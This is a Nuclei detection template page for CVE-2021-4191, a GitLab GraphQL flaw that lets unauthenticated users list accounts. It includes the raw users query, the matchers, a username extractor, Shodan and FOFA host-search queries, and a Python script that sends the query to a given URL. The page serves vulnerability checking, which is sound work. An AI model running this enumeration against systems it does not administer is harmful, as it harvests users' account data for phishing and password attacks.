GitLab GraphQL API User Enumeration
ID: CVE-2021-4191
Severity: medium
Author: zsusac
Tags: cve2021,cve,gitlab,api,graphql,enum,unauth
Description
An unauthenticated remote attacker can leverage this vulnerability to collect registered GitLab usernames, names, and email addresses.
YAML Source
id: CVE-2021-4191

info:
  name: GitLab GraphQL API User Enumeration
  author: zsusac
  severity: medium
  description: An unauthenticated remote attacker can leverage this vulnerability to collect registered GitLab usernames, names, and email addresses.
  impact: |
    An attacker can enumerate valid usernames, which can be used for further attacks such as brute-forcing passwords or launching targeted phishing campaigns.
  remediation: |
    Implement rate limiting or CAPTCHA on the GraphQL API to prevent user enumeration.
  reference:
    - https://www.rapid7.com/blog/post/2022/03/03/cve-2021-4191-gitlab-graphql-api-user-enumeration-fixed/
    - https://thehackernews.com/2022/03/new-security-vulnerability-affects.html
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-4191
    - https://gitlab.com/gitlab-org/gitlab/-/issues/343898
    - https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-4191.json
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2021-4191
    cwe-id: CWE-287
    epss-score: 0.24657
    epss-percentile: 0.96207
    cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*
  metadata:
    max-request: 1
    vendor: gitlab
    product: gitlab
    shodan-query:
      - cpe:"cpe:2.3:a:gitlab:gitlab"
      - http.title:"gitlab"
    fofa-query: title="gitlab"
    google-query: intitle:"gitlab"
  tags: cve2021,cve,gitlab,api,graphql,enum,unauth

http:
  - raw:
      - |
        POST /api/graphql HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Accept: */*
        Origin: {{RootURL}}
        Referer: {{RootURL}}/-/graphql-explorer

        {"query":"# Welcome to GraphiQL\n#\n# GraphiQL is an in-browser tool for writing, validating, and\n# testing GraphQL queries.\n#\n# Type queries into this side of the screen, and you will see intelligent\n# typeaheads aware of the current GraphQL type schema and live syntax and\n# validation errors highlighted within the text.\n#\n# GraphQL queries typically start with a \"{\" character. Lines that starts\n# with a # are ignored.\n#\n# An example GraphQL query might look like:\n#\n# {\n# field(arg: \"value\") {\n# subField\n# }\n# }\n#\n# Keyboard shortcuts:\n#\n# Prettify Query: Shift-Ctrl-P (or press the prettify button above)\n#\n# Run Query: Ctrl-Enter (or press the play button above)\n#\n# Auto Complete: Ctrl-Space (or just start typing)\n#\n\n{\n users {\n nodes {\n id\n name\n username\n }\n }\n}","variables":null,"operationName":null}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"data"'
          - '"users"'
          - '"nodes"'
          - '"id"'
          - 'gid://'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: json
        json:
          - '.data.users.nodes[].username'
# digest: 4b0a00483046022100fa86c5f32fbeab69b62bc7e9dfdc020c46ddf48c28c379d494c60e611501a831022100a6264296ef88c432517c86335a65e762f329e12ae38ed20f0121a39b73883aaf:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template detects the user enumeration issue described above by sending the unauthenticated `users` query to `/api/graphql` and matching a 200 response whose body contains the `data.users.nodes` structure and `gid://` user IDs. Run it with Nuclei against the instance you want to check:
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-4191.yaml"
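The following is an added example, not part of the Nuclei template or of GitLab, showing how the template's matcher and extractor logic decide a result, so an administrator can reproduce the check against their own instance or re-evaluate a captured response offline. The response bodies are constructed for illustration (the `nodes: []` form is an assumption about what a non-disclosing instance might return, not documented GitLab behaviour); `live_check` is a helper added here that sends the same query the template sends.

```python
"""Offline re-implementation of the CVE-2021-4191 template's matchers and
extractor, plus a small live check for verifying your own GitLab instance.

Added example; not the Nuclei project's code and not GitLab's code.
"""
import json
import sys
import urllib.error
import urllib.request

# The query the template sends, with the GraphiQL banner comments stripped.
USERS_QUERY = "{ users { nodes { id name username } } }"

# Literal strings the template's word matcher requires in the body (condition: and).
REQUIRED_WORDS = ('"data"', '"users"', '"nodes"', '"id"', 'gid://')


def body_matches(body: str, status: int) -> bool:
    """Mirror the template's matchers: HTTP 200 AND every required word in the body."""
    return status == 200 and all(word in body for word in REQUIRED_WORDS)


def extract_usernames(body: str) -> list:
    """Mirror the extractor '.data.users.nodes[].username' using plain json."""
    try:
        doc = json.loads(body)
    except json.JSONDecodeError:
        return []
    users = (doc.get("data") or {}).get("users") or {}
    nodes = users.get("nodes") or []
    return [n["username"] for n in nodes if isinstance(n, dict) and "username" in n]


def assess(body: str, status: int) -> dict:
    """Verdict for one response: did the matchers fire, and what did the extractor yield."""
    return {"matched": body_matches(body, status), "usernames": extract_usernames(body)}


def live_check(root_url: str, timeout: float = 10.0) -> dict:
    """Send the unauthenticated query to ROOT_URL/api/graphql (hypothetical helper for
    checking an instance you administer) and assess the reply."""
    payload = {"query": USERS_QUERY, "variables": None, "operationName": None}
    req = urllib.request.Request(
        root_url.rstrip("/") + "/api/graphql",
        data=json.dumps(payload).encode(),
        headers={"Content-Type": "application/json", "Accept": "*/*"},
        method="POST",
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return assess(resp.read().decode("utf-8", "replace"), resp.status)
    except urllib.error.HTTPError as err:
        # Non-2xx replies still carry a body; assess it the same way (status will not be 200).
        return assess(err.read().decode("utf-8", "replace"), err.code)


# Constructed sample: the shape of an affected instance's reply (names are made up).
SAMPLE_VULNERABLE = json.dumps({"data": {"users": {"nodes": [
    {"id": "gid://gitlab/User/1", "name": "Example Admin", "username": "root"},
    {"id": "gid://gitlab/User/2", "name": "Example User", "username": "jdoe"},
]}}})

# Constructed sample (assumption): a reply that withholds user records entirely.
SAMPLE_SAFE = json.dumps({"data": {"users": {"nodes": []}}})

if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(json.dumps(live_check(sys.argv[1]), indent=2))
    else:
        print("affected sample :", assess(SAMPLE_VULNERABLE, 200))
        print("withheld sample :", assess(SAMPLE_SAFE, 200))
```

Run without arguments to see the two constructed samples evaluated; with a root URL argument it performs the same request the template does and reports whether the matchers would fire. Note that the `"id"` and `gid://` words are what separate an answer that actually discloses records from one that merely echoes an empty `users.nodes` structure, which is why the template requires all five words with `condition: and`.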